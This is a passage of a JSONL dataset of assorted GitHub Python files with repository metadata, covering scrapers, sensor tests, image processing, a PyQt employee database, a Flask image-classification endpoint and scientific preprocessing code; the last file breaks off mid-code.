+{"seq_id":"6766661709","text":"import functools\n\ndef memoize(func):\n cache = func.cache = {}\n @functools.wraps(func)\n def memoized_func(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = func(*args, **kwargs)\n return cache[key]\n return memoized_func\n\n@memoize\ndef sudan(n, x, y):\n if n == 0:\n return x + y\n if y == 0:\n return x\n else:\n return sudan(n - 1, sudan(n, x, y - 1), sudan(n, x, y - 1) + y)\n \nprint (sudan(2, 3, 1))\nprint (sudan(2, 4, 1))\nprint (sudan(2, 1, 2))\nprint (sudan(2, 2, 2))","repo_name":"karol95c/University","sub_path":"Python/Lab3/memoize.py","file_name":"memoize.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"3355453882","text":"import json\nimport requests\nimport os\nimport time\n\n#url='http://marketplace.envato.com/api/edge/item:10431404.json'\ntheme = open('theme_id.txt','r')\ntheme_id = theme.readlines()\ntotal_theme = theme_id.__len__()\n\nsave_to_file = open('theme_data_Apr05.txt','r+', buffering = -1)\n\ni=0\nwhile i < total_theme:\n url1 = 'http://marketplace.envato.com/api/edge/item:' + theme_id[i] + '.json'\n i += 1\n# data = requests.get(url1).text\n# data = json.loads(data)\n data = requests.get(url1).json()\n try:\n url = data ['item']['url']\n except TypeError:\n url = 'empty'\n pass\n print (url1)\n# print (url)\n themeforest = url.find('http://themeforest.net/')\n if themeforest != -1:\n item_id = data ['item']['id']\n item_name = data ['item']['item']\n user = data ['item']['user']\n sales = data ['item']['sales']\n# rating = data ['item']['rating']\n rating_decimal = data ['item']['rating_decimal']\n cost = data ['item']['cost']\n uploaded_on = data ['item']['uploaded_on']\n last_update = data ['item']['last_update']\n category = data['item']['category']\n tags = data ['item']['tags']\n string = item_id+';'+item_name+';'+user+';'+url+';'+sales+';'+cost+';'+rating_decimal+';'+uploaded_on+';'+last_update+';'+category+';'+tags+'\\n'\n string_encode = string.encode('ascii','replace')\n# print(string_encode)\n string_decode = string_encode.decode('ascii','replace')\n save_to_file.write(string_decode)\n save_to_file.flush()\n os.fsync(save_to_file.fileno())\n #time.sleep(4)\n else:\n continue\n \nprint (item_no)\n\nsave_to_file.close()\n\n","repo_name":"manojps/envato-marketplace-stats-using-api","sub_path":"envato_item_api.py","file_name":"envato_item_api.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"26522166901","text":"#filename: getip.py\n\nimport os\nimport sys\n\ndef get_ips():\n\n tmp=list()\n \n ipcsv_path=os.path.join(sys.path[0],'ip_10896_5w.csv')\n f=open(ipcsv_path,'r')\n for line in f.readlines():\n line=line.strip().split('.')\n line[0]=\".\".join(line[0:2])\n line[1]=256*int(line[2])+int(line[3])\n tmp.append(line[:2])\n tmp.sort()\n f.close\n \n return tmp\n\n#list=get_ips()\n#print list\n","repo_name":"maixiaohai/mydocuments","sub_path":"ip2region_test/getip.py","file_name":"getip.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"40351317023","text":"import time\nimport board\nimport microcontroller\nimport busio\nimport adafruit_adxl37x\nimport adafruit_bmp3xx\nimport adafruit_lis331\nimport adafruit_ms8607\n\n# Initialize I2C bus\ni2c = busio.I2C(board.IO9, board.IO8)\n\n# Check for connected I2C devices\nwhile not i2c.try_lock():\n pass\ndevices = i2c.scan()\ni2c.unlock()\n\n# Test each I2C device\nfor device in devices:\n try:\n print()\n print(\"-------------------------------------------------------\")\n print(\"Testing device at address: \", hex(device))\n if device == 0x76:\n sensor = adafruit_ms8607.MS8607(i2c)\n print(\"MS8607 P/T sensor found!\")\n print(\"Temperature: \", sensor.temperature)\n print(\"Pressure: \", sensor.pressure)\n elif device == 0x40:\n sensor = adafruit_ms8607.MS8607(i2c)\n print(\"MS8607 H sensor found!\")\n print(\"Humidity: \", sensor.relative_humidity)\n elif device == 0x77:\n sensor = adafruit_bmp3xx.BMP3XX_I2C(i2c, 0x77)\n print(\"BMP390 sensor found!\")\n print(\"Temperature: \", sensor.temperature)\n print(\"Pressure: \", sensor.pressure)\n elif device == 0x1d:\n sensor = adafruit_adxl37x.ADXL375(i2c, 0x1d)\n print(\"ADXL375 accelerometer found!\")\n print(\"Acceleration (m/s^2): X=%0.3f, Y=%0.3f, Z=%0.3f\" % sensor.acceleration)\n elif device == 0x19:\n sensor = adafruit_lis331.LIS331HH(i2c, 0x19)\n print(\"LIS331 accelerometer found!\")\n print(\"Acceleration (m/s^2): X=%0.3f, Y=%0.3f, Z=%0.3f\" % sensor.acceleration)\n else:\n raise ValueError(\"Unknown device at address: \", hex(device))\n except ValueError as ve:\n print(ve)\n except Exception as e:\n print(\"Error testing device at address \", hex(device), \": \", e)\n\n time.sleep(0.5) # Pause between sensor tests\nprint()\nprint(\"-------------------------------------------------------\")\n","repo_name":"UMBRA-Electronics/ExoBronco-Avionics","sub_path":"Software/Board_Files/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"18316962117","text":"# coding: utf-8\n# python3.5.3\n# edge_detecting.py\n\nimport cv2\n\nfrom skimage import data, segmentation\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\nparser.add_argument(\"--content\", type=str)\nparser.add_argument('--output', type=str)\n# blurred staus >>> normal=< 7\nparser.add_argument('--blurred', type=int)\nargs = parser.parse_args()\n\nglobal image, minT, maxT\n\n# Callback function for minimum threshold trackbar.\ndef adjustMinT(v):\n global minT\n minT = v\n cannyEdge()\n\n# Callback function for maximum threshold trackbar.\ndef adjustMaxT(v):\n global maxT\n maxT = v\n cannyEdge()\n\n\n###################################\n# Main program begins here. \n###################################\n\n\n# load original image as grayscale\nimage = cv2.imread(filename=args.content, flags=cv2.IMREAD_GRAYSCALE)\n\n# set up display window with trackbars for minimum and maximum threshold\n# values\n# 추후에 미세값 조정하기 위한 부분으로 현재는 미완료부분임.\ncv2.namedWindow(winname = \"edges\", flags = cv2.WINDOW_NORMAL)\n\nminT = 30\nmaxT = 150\n\n# cv2.createTrackbar() does not support named parameters\ncv2.createTrackbar(\"minT\", \"edges\", minT, 255, adjustMinT)\ncv2.createTrackbar(\"maxT\", \"edges\", maxT, 255, adjustMaxT)\n\n# Smoothing without removing edges.\ngray_filtered = cv2.bilateralFilter(image, 7, 50, 50)\n\n# minT, maxT 값을 밖으로 빼내서 조정값으로 변경해야함. 추후\nedge = cv2.Canny(image=gray_filtered, threshold1=minT, threshold2=maxT)\n\n# subtract 방식이 색상 미세조정이 가능해서 더 성능이 좋아보여, bitwise 를 대기로 함.\n# edge = cv2.bitwise_not(edge)\nedge = cv2.subtract(250, edge)\n\ncv2.imwrite(args.output, edge)","repo_name":"mrsono0/mangoPaint","sub_path":"Effects/edge_detecting.py","file_name":"edge_detecting.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"8433504073","text":"from odoo.tests import tagged\n\nfrom odoo.addons.payment_xendit.tests.common import XenditCommon\n\n\n@tagged('post_install', '-at_install')\nclass TestPaymentProvider(XenditCommon):\n def test_incompatible_with_unsupported_currencies(self):\n \"\"\" Test that Xendit providers are filtered out from compatible providers when the currency\n is not supported. \"\"\"\n compatible_providers = self.env['payment.provider']._get_compatible_providers(\n self.company_id, self.partner.id, self.amount, currency_id=self.env.ref('base.AFN').id\n )\n self.assertNotIn(self.xendit, compatible_providers)\n","repo_name":"Vauxoo/odoo","sub_path":"addons/payment_xendit/tests/test_payment_provider.py","file_name":"test_payment_provider.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"}
+{"seq_id":"12164224651","text":"#Captura de todas las excepciones sin discriminar el tipo.\n\"\"\"\nRealizar la carga de dos números por teclado e imprimir la división del primero respecto al \nsegundo. Capturar cualquier tipo de excepción que se dispare.\n\"\"\"\n\ntry:\n numero1= int(input(\"Ingrese un numero \"))\n numero2= int(input(\"Ingrese un nuevo numero \"))\n division = numero1 / numero2\n print(\"La division de ambos numeros es \", division)\nexcept:\n print(\"Problemas con la entrada de valores o en la operacion\")","repo_name":"SaraEOlivera/Ejercicios-Python","sub_path":"Python Github/Biblioteca - POO/58. Manejo de excepciones.py","file_name":"58. Manejo de excepciones.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"70115498450","text":"class Solution:\n def minWindow(self, s: str, t: str) -> str:\n \n if t == \"\": return \"\"\n\n countT, countS = {}, {}\n\n for char in t:\n countT[char] = 1 + countT.get(char,0)\n\n res, resLen = (-1,-1), float('inf')\n\n have, need = 0, len(countT)\n\n left = 0\n\n for right in range(len(s)):\n curr = s[right]\n countS[curr] = 1 + countS.get(curr,0)\n\n if curr in countT and countS[curr] == countT[curr]:\n have += 1\n \n while have == need:\n if resLen > (right - left + 1):\n res = (left,right)\n resLen = (right - left + 1)\n \n leftChar = s[left]\n countS[leftChar] -= 1\n\n if leftChar in countT and countS[leftChar] < countT[leftChar]:\n have -= 1\n \n left += 1\n left,right = res\n\n return s[left:right+1] if resLen != float('inf') else \"\"\n\n\n","repo_name":"karan-mudaliar/LeetCode","sub_path":"0076-minimum-window-substring/0076-minimum-window-substring.py","file_name":"0076-minimum-window-substring.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"18176428451","text":"# TODO: добавить поиск по имени/фамилии/логину/id добаить комбобокс и поле ввода\n\nimport sqlite3\nimport sys\n\nfrom PyQt5.QtWidgets import QWidget, QApplication, QTableWidgetItem, QHeaderView, QMessageBox\n\nimport modules.account\nimport modules.login\nimport modules.search\nimport modules.addDialog\nimport modules.changeDialog\nfrom templates.control_employees import Ui_Control\n\n\nclass Control(QWidget, Ui_Control):\n def __init__(self, login, passwd):\n super().__init__()\n self.setupUi(self)\n self.con = sqlite3.connect('management.db')\n\n self.account = modules.account.Account(login, passwd)\n cur = self.con.cursor()\n self.importance = cur.execute(f\"SELECT importance FROM positions \"\n f\"WHERE position = '{self.account.get_position()}'\").fetchone()[0]\n self.importances = [i[0] for i in cur.execute(\"SELECT importance FROM positions\").fetchall()]\n cur.close()\n\n self.fill_work_table()\n self.config()\n self.fill_filter_cb()\n\n self.newWorkerBtn.clicked.connect(self.add_employee)\n self.setWorkerBtn.clicked.connect(self.update_employee)\n self.deleteWorkerBtn.clicked.connect(self.delete_employee)\n self.filterEdit.textChanged.connect(self.fill_work_table_filter)\n\n def fill_work_table(self):\n sql = \"SELECT * FROM workers\"\n\n cur = self.con.cursor()\n data = cur.execute(sql).fetchall()\n headers = cur.description\n headers = [headers[i][0] for i in range(len(headers))]\n cur.close()\n\n if self.importance != max(self.importances):\n self.outputWorkers.setColumnCount(len(data[0]) - 2)\n else:\n self.outputWorkers.setColumnCount(len(data[0]))\n self.outputWorkers.setHorizontalHeaderLabels(headers)\n header = self.outputWorkers.horizontalHeader()\n header.setSectionResizeMode(0, QHeaderView.Stretch)\n self.outputWorkers.setRowCount(0)\n\n for i, row in enumerate(data):\n self.outputWorkers.setRowCount(self.outputWorkers.rowCount() + 1)\n for j, elem in enumerate(row):\n self.outputWorkers.setItem(i, j, QTableWidgetItem(str(elem)))\n\n \"\"\"==================ФИЛЬТРАЦИЯ-НАЧАЛО========================\"\"\"\n\n def fill_filter_cb(self):\n if self.importance == max(self.importances):\n self.filterBox.addItems(['Имя', \"Фамилия\", \"Логин\", \"ID\"])\n else:\n self.filterBox.addItems(['Имя', \"Фамилия\", \"ID\"])\n\n def fill_work_table_filter(self):\n if not self.filterEdit.text():\n self.fill_work_table()\n result = modules.search.search(self.filterBox.currentText(), self.filterEdit.text())\n if not result:\n return\n data = result[0]\n self.outputWorkers.clear()\n self.outputWorkers.setRowCount(0)\n\n for i, row in enumerate(data):\n self.outputWorkers.setRowCount(self.outputWorkers.rowCount() + 1)\n for j, elem in enumerate(row):\n self.outputWorkers.setItem(i, j, QTableWidgetItem(str(elem)))\n\n \"\"\"==================ФИЛЬТРАЦИЯ-КОНЕЦ========================\"\"\"\n\n \"\"\"=============НАСТРОЙКА НАЧАЛО============\"\"\"\n def config(self):\n if self.importance == 2:\n self.newWorkerBtn.setEnabled(False)\n self.setWorkerBtn.setEnabled(False)\n self.deleteWorkerBtn.setEnabled(False)\n elif self.importance == max(self.importances):\n import modules.positions\n\n self.tabs.addTab(modules.positions.Positions(), 'Должности')\n else:\n self.setWorkerBtn.setEnabled(False)\n \"\"\"=============НАСТРОЙКА КОНЕЦ============\"\"\"\n\n \"\"\"=============УПРАВЛЕНИЕ СОТРУДНИКАМИ НАЧАЛО============\"\"\"\n\n def add_employee(self):\n dlg = modules.addDialog.AddDialog(self.outputWorkers.selectedItems(), self.outputWorkers, self.account)\n dlg.exec()\n 
if dlg.result():\n self.fill_work_table()\n\n def update_employee(self):\n dlg = modules.changeDialog.ChangeDialog(self.outputWorkers.selectedItems(), self.outputWorkers, self.account)\n dlg.exec()\n if dlg.result():\n self.fill_work_table()\n\n def delete_employee(self):\n try:\n elem = self.outputWorkers.selectedItems()[0]\n idd = self.outputWorkers.item(elem.row(), 0).text()\n except IndexError:\n return\n\n cur = self.con.cursor()\n login = cur.execute(f\"SELECT login FROM workers WHERE id = {idd}\").fetchone()[0]\n cur.close()\n\n if login == self.account.get_login():\n QMessageBox.about(self, 'Ошибка', 'Вы не можете удалить самого себя!')\n return\n\n cur = self.con.cursor()\n elem_importance = cur.execute(\n f\"SELECT importance FROM positions WHERE position = '{self.outputWorkers.item(elem.row(), 6).text()}'\").fetchone()[\n 0]\n cur.close()\n if self.importance < elem_importance:\n QMessageBox.about(self, 'Ошибка', 'Вы не можете удалить сотрудника, превосходящего вас по должности!')\n return\n\n valid = QMessageBox.question(self, 'Удаление', f\"Действительно удалить сотрудника с id {str(idd)}?\",\n QMessageBox.Yes, QMessageBox.No)\n\n if valid == QMessageBox.Yes:\n cur = self.con.cursor()\n cur.execute(f\"DELETE FROM workers WHERE id IN ({str(idd)})\")\n cur.close()\n self.con.commit()\n self.fill_work_table()\n\n \"\"\"=============УПРАВЛЕНИЕ СОТРУДНИКАМИ КОНЕЦ============\"\"\"\n\n\ndef exception_hook(cls, exception, traceback):\n sys.__excepthook__(cls, exception, traceback)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = modules.login.Login()\n ex.show()\n sys.excepthook = exception_hook\n sys.exit(app.exec_())\n","repo_name":"hatedestiny6/projectYandex","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6237,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"}
+{"seq_id":"28218507873","text":"import mahotas\n\nclass ZernikeMoments:\n \n def __init__(self, radius):\n # store the size of the radius that will be used when computing moments\n self.radius = radius\n\n def describe(self, image):\n # return the Zerinke moments for the image\n return mahotas.features.zernike_moments(image, self.radius)\n\n# indexing pokemon sprites\n\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nimport cv2\n\n# construct argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-s\", \"--sprites\", required = True,\n help = \"Path where the sprites will be stored\")\nap.add_argument(\"-i\", \"--index\", required = True,\n help = \"Path where the index file will be stored\")\nargs = vars(ap.parse_args())\n\n# intialize our descriptor (Zerinke Moments with a radius of 21\n# used to characterize the shape of our pokemon) and our index dictionary\ndesc = ZernikeMoments(21)\nindex = {}\n\n# loop over the sprite images\nfor spritePath in glob.glob(args[\"sprites\"] + \"/*.png\"):\n \n # parse ot the pokemon name, then load the image and convert to grayscale\n pokemon = spritePath[spritePath.rfind(\"/\") + 1:].replace(\".png\", \"\")\n image = cv2.imread(spritePath)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # pad the image with extra white pixels to ensure the edges of the \n # pokemon are not up against the borders of the image\n image = cv2.copyMakeBorder(image, 15,15,15,15, cv2.BORDER_CONSTANT, value = 255)\n\n # invert + threshold image\n # the inversion takes place so the foreground is white\n thresh = cv2.bitwise_not(image)\n thresh[thresh > 0] = 255\n\n # intialize the outline image, find the outermost\n # contours (outline) of the pokemon, the draw it\n outline = np.zeros(image.shape, dtype = \"uint8\")\n (_, cnts, _) = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, \n cv2.CHAIN_APPROX_SIMPLE)\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[0]\n cv2.drawContours(outline, [cnts],-1,255,-1)\n\n # compute Zernike moments to characterize the shape of pokemon outline\n # the update index\n moments = desc.describe(outline)\n index[pokemon] = moments\n\n# write index to file\nwith open(args[\"index\"], 'wb') as f:\n pickle.dump(index, f)\n\n","repo_name":"AdamBioprinter/OpenCV-Python-Tutorials","sub_path":"opencv/pyimagesearchTuts/Pokedex2.py","file_name":"Pokedex2.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"19243559522","text":"from my_city.views import CityNewsViewSet\nfrom rest_framework.routers import SimpleRouter\n\n\nclass OptionalSlashRouter(SimpleRouter):\n\n def __init__(self):\n self.trailing_slash = '/?'\n super(SimpleRouter, self).__init__()\n\n\nrouter = OptionalSlashRouter()\nrouter.register(r'my_city', CityNewsViewSet)\nurlpatterns = router.urls\n","repo_name":"AltynbekPirman/soAktau","sub_path":"backend/src/my_city/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"29513116031","text":"# square and multiply modular expoentiation\nfrom traditional_extended_eudlidean import polynomial\nP = polynomial()\n\n\n# suppose p is the characteristic of the field F_p\ndef square_and_multiply(f, g, m, p):\n [_, temp] = P.div(f, g, p)\n result = [1]\n while m != 0:\n m, flag = m / 2, m % 2\n if flag == 1:\n [_, result] = P.div(P.mul(temp, result, p), g, p)\n [_, temp] = P.div(P.mul(temp, temp, p), g, p)\n return result\n","repo_name":"JenTus/AdvancedAlgorithm","sub_path":"square_and_multiply.py","file_name":"square_and_multiply.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"42739851486","text":"\"\"\"Permet de visualiser et d'exploiter\r\nles données générées avec le processus\r\nmarkovien par le code stats_from_markov\"\"\"\r\n# from Code.V2.general import *\r\nfrom general import *\r\nimport numpy as np\r\nfrom pickle import Pickler, Unpickler\r\n\r\n\r\ndef stats_from_markov(\r\n nb_line: int = 1,\r\n nb_column: int = 1,\r\n sample: int = 1_000)\\\r\n -> tuple:\r\n \"\"\"Génère des tas de sable stable aléatoirement.\r\n Revoie la liste de fréquences des tas récurents et non récurents\"\"\"\r\n min_array = None\r\n min_weight = nb_line * nb_column * 3\r\n weight_recurrent = np.zeros(nb_line * nb_column * 3 + 1, dtype=np.int64)\r\n collapse_weight = np.zeros(nb_line * nb_column * 18, dtype=np.int64)\r\n loosed_weight = np.zeros(nb_line * nb_column * 3 + 1, dtype=np.int64)\r\n\r\n tas = neutral(nb_line, nb_column)\r\n weight = tas.sum()\r\n old_weight = weight\r\n adding_location = 0, 0\r\n for _ in range(sample):\r\n while tas.max() <= 3:\r\n old_weight += 1\r\n adding_location = np.random.randint(0, nb_line), np.random.randint(0, nb_column)\r\n tas[adding_location] += 1\r\n\r\n this_collapse_weight = collapse_large(tas, adding_location[0], adding_location[1]) // 4\r\n\r\n weight = tas.sum()\r\n this_loosed_weight = old_weight - weight\r\n old_weight = weight\r\n\r\n # configuration\r\n weight_recurrent[weight] += 1\r\n if weight < min_weight:\r\n min_weight = weight\r\n min_array = np.copy(tas)\r\n\r\n # collapse weight\r\n if this_collapse_weight > nb_line * nb_column * 18:\r\n raise IndexError(f\"{this_collapse_weight} est l'avalanche de trop\")\r\n else:\r\n collapse_weight[this_collapse_weight] += 1\r\n\r\n # loosed weight\r\n loosed_weight[this_loosed_weight] += 1\r\n\r\n return nb_line, nb_column, sample, weight_recurrent, min_array, collapse_weight, loosed_weight\r\n\r\n\r\ndef save_stats(nb_line, nb_column, sample):\r\n \"\"\"Save the stats\"\"\"\r\n with open(f\"Data\\Markov\\\\markov_{nb_line}_{nb_column}_{sample}\", 'wb') as file:\r\n pic = Pickler(file)\r\n pic.dump(stats_from_markov(nb_line, nb_column, sample))\r\n\r\n\r\nif __name__ == '__main__':\r\n from time import perf_counter as perf\r\n t = perf()\r\n save_stats(70, 70, 10_000_000)\r\n print(perf() - t)\r\n","repo_name":"TheoRudkiewicz/TIPE-Modele-du-tas-de-sable-abelien","sub_path":"Rectangle/Statistiques/stats_from_markov.py","file_name":"stats_from_markov.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"}
+{"seq_id":"12065840661","text":"from flask import Flask, request, redirect, url_for, flash\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.applications.inception_v3 import *\nfrom tensorflow.keras import backend as K\nfrom werkzeug.utils import secure_filename\n\nimport json\nimport numpy as np\nimport os\n\nUPLOAD_FOLDER = './image_sets/'\nif not os.path.exists(UPLOAD_FOLDER):\n os.mkdir(UPLOAD_FOLDER)\n\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef InceptV3(img):\n # Load InceptionV3 Image\n model = InceptionV3(include_top=True, weights='imagenet')\n # Resize the image\n img = image.load_img(img, target_size=(299, 299))\n # Change the image to array\n x = image.img_to_array(img)\n # Add dimension to image\n x = np.expand_dims(x, axis=0)\n # Normalize the data between 0 to 1\n x = preprocess_input(x)\n # Get prediciton\n preds = model.predict(x)\n result = dict((key, str(value)) for (_,key, value) in decode_predictions(preds)[0])\n K.clear_session()\n return json.dumps(result)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n global model\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n img = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n predict_results = InceptV3(img)\n return predict_results\n return '''\n \n Upload new File\n
Upload new File
\n \n '''\n\n@app.route('/train',methods = ['GET','POST'])\ndef training():\n if request.method == \"POST\":\n\n return \"This is inceptionV3 return\"\n return '''\n \n Training\n
Training Custom data
\n \n '''\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=5001,debug=True,threaded=False)\n","repo_name":"twcc/AI-Services","sub_path":"Tutorial_Three/inceptionv3/inference/flask_web.py","file_name":"flask_web.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"66"}
+{"seq_id":"7085289520","text":"import argparse\n\ndef get_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--input')\n parser.add_argument('--mapping')\n parser.add_argument('--output')\n args = parser.parse_args()\n\n return args\n\ndef main(args):\n\n mapping = {}\n for line in open(args.mapping):\n src, tgt = line.strip().split()\n mapping[src] = tgt\n \n with open(args.output, 'w') as f:\n for line in open(args.input):\n s = ' '.join([mapping[w] for w in line.strip().split()])\n print(s, file=f)\n \nif __name__ == '__main__':\n\n args = get_args()\n main(args)","repo_name":"bearhsiang/SSLST","sub_path":"utils_new/map_hidden_unit.py","file_name":"map_hidden_unit.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"}
+{"seq_id":"72258628371","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport re\n\n\nclass Machine:\n def __init__(self, instructions):\n self.instructions = instructions\n self.mask = 'X'\n self.memory = {}\n\n\n def apply_mask(self, value):\n mask = int(self.mask.replace('0', '1').replace('X', '0'), 2)\n overwrite = int(self.mask.replace('X', '0'), 2)\n return (overwrite & mask) | (value & (~mask))\n\n def run(self):\n for instruction in self.instructions:\n m = re.match(r\"mask = ([01X]+)\", instruction)\n if m:\n self.mask = m.group(1)\n continue\n m = re.match(r\"mem\\[(\\d+)\\] = (\\d+)\", instruction)\n if m:\n address = int(m.group(1))\n value = int(m.group(2))\n value_set = self.apply_mask(value)\n self.memory[address] = value_set\n\n\n\ndef main():\n with open(\"input\") as f:\n s = f.read()\n\n machine = Machine(s.splitlines())\n machine.run()\n result = sum(machine.memory.values())\n print(f\"Part 1: {result}\")\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fparat/adventofcode","sub_path":"2020/day14/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"11373114483","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom pickle import dump\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom torch import from_numpy\nfrom cfdpinn.plots import create_animation\n\ndef preprocess(data,geom,args):\n \"\"\"\n Returns a dict holding the NumPy arrays needed for PINN training\n \"\"\"\n #Merge features x,y,t into single array in data\n data = merge_features(data,geom)\n\n #Seperate into boundary and interior arrays\n data = extract_boundaries(data)\n data = extract_interior(data)\n\n #Obtain feature scaling object\n #Note that scaling is not applied until after training \n #locations are obtained as this requires using \n #pre-scaled spatio-temporal locations\n data[\"scaler\"] = scaling_object(data)\n if args.save_scaler_path != \"\":\n dump(data[\"scaler\"], open(args.save_scaler_path, \"wb\"))\n\n #Create training locations\n data = get_training_locations(data,args)\n\n #Train-test-splitting\n data = apply_scaling(data)\n data = apply_train_test_split(data,args.test_size,scaled=True)\n\n #Make boundary arrays contiguous for PyTorch\n data = make_boundary_arrays_contiguous(data)\n\n return data\n\ndef scaling_object(data):\n \"\"\"\n Fit a standard scaler to the training data\n features and return it.\n \"\"\"\n _scaler = StandardScaler()\n scaler = _scaler.fit(data[\"features\"])\n \n return scaler\n\ndef apply_scaling(data):\n \"\"\"\n Apply the data scaler to all training locations\n to be used in PINN training\n \"\"\"\n data_labels = [\"basewall\",\"interior\",\"leftwall\",\"rightwall\"]\n for data_label in data_labels:\n data[f\"scaled_features_{data_label}\"] = \\\n data[\"scaler\"].transform(data[f\"features_{data_label}\"])\n \n return data\n\ndef get_training_locations(data,args):\n \"\"\"\n Store the index of training locations chosen\n by train test split. 
This allows plotting for\n future visualization.\n \"\"\"\n #First need to apply train_test_splitting to \n #replicate real train_test_split\n data = apply_train_test_split(data,args.test_size,scaled=False)\n\n #Now extract locations for all components of\n #training data arrays\n array_labels = [\"interior\",\"basewall\",\"rightwall\",\"leftwall\"]\n for array_label in array_labels:\n data[f\"{array_label}_training_locs\"] = np.concatenate(\n (\n data[f\"t_{array_label}_train\"].flatten().reshape(-1,1),\n data[f\"y_{array_label}_train\"].flatten().reshape(-1,1),\n data[f\"x_{array_label}_train\"].flatten().reshape(-1,1)\n ), \n axis=1)\n\n data[f\"{array_label}_training_locs\"] = \\\n data[f\"{array_label}_training_locs\"][data[f\"{array_label}_training_locs\"][:,0].argsort()]\n\n return data\n\ndef apply_train_test_split(data,test_size,scaled):\n \"\"\"\n Apply train-test splitting for all training data\n arrays.\n \"\"\"\n if scaled == True:\n label = \"scaled_\"\n elif scaled == False:\n label = \"\"\n\n #Interior\n (\n data[\"x_interior_train\"],\n data[\"x_interior_test\"],\n data[\"y_interior_train\"],\n data[\"y_interior_test\"],\n data[\"t_interior_train\"],\n data[\"t_interior_test\"],\n data[\"u_interior_train\"],\n data[\"u_interior_test\"],\n data[\"v_interior_train\"],\n data[\"v_interior_test\"],\n data[\"p_interior_train\"],\n data[\"p_interior_test\"],\n ) = train_test_split(\n data[f\"{label}features_interior\"][:,2], \n data[f\"{label}features_interior\"][:,1], \n data[f\"{label}features_interior\"][:,0],\n data[\"u_interior_labels\"],\n data[\"v_interior_labels\"],\n data[\"p_interior_labels\"],\n test_size=test_size)\n\n #Basewall\n (\n data[\"x_basewall_train\"],\n data[\"x_basewall_test\"],\n data[\"y_basewall_train\"],\n data[\"y_basewall_test\"],\n data[\"t_basewall_train\"],\n data[\"t_basewall_test\"],\n data[\"u_basewall_train\"],\n data[\"u_basewall_test\"],\n data[\"v_basewall_train\"],\n data[\"v_basewall_test\"],\n data[\"p_basewall_train\"],\n data[\"p_basewall_test\"],\n ) = train_test_split(\n data[f\"{label}features_basewall\"][:,2], \n data[f\"{label}features_basewall\"][:,1], \n data[f\"{label}features_basewall\"][:,0],\n data[\"u_basewall_labels\"],\n data[\"v_basewall_labels\"],\n data[\"p_basewall_labels\"],\n test_size=test_size)\n\n #Leftwall\n (\n data[\"x_leftwall_train\"],\n data[\"x_leftwall_test\"],\n data[\"y_leftwall_train\"],\n data[\"y_leftwall_test\"],\n data[\"t_leftwall_train\"],\n data[\"t_leftwall_test\"],\n data[\"u_leftwall_train\"],\n data[\"u_leftwall_test\"],\n 